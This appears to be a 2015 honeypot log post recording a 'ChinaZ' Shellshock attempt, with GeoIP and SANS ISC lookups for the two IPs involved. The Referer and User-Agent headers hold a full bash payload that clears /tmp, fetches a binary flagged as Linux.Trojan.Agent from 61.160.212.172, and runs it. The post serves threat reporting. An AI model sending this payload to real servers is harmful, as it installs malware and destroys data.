Mittwoch, 30. September 2015

61.161.130.241 - ChinaZ attempt via 61.160.212.172

BEGIN OF HTTP DATA:
2015-09-30 11:05:18
Source IP: 61.161.130.241
Country: CN RiskScore: 1 Malware: []
GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
I did not thought to see that again :-)
java: Linux.Trojan.Agent FOUND

61.161.130[.]241

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.161.130.241

61.160.212[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.212.172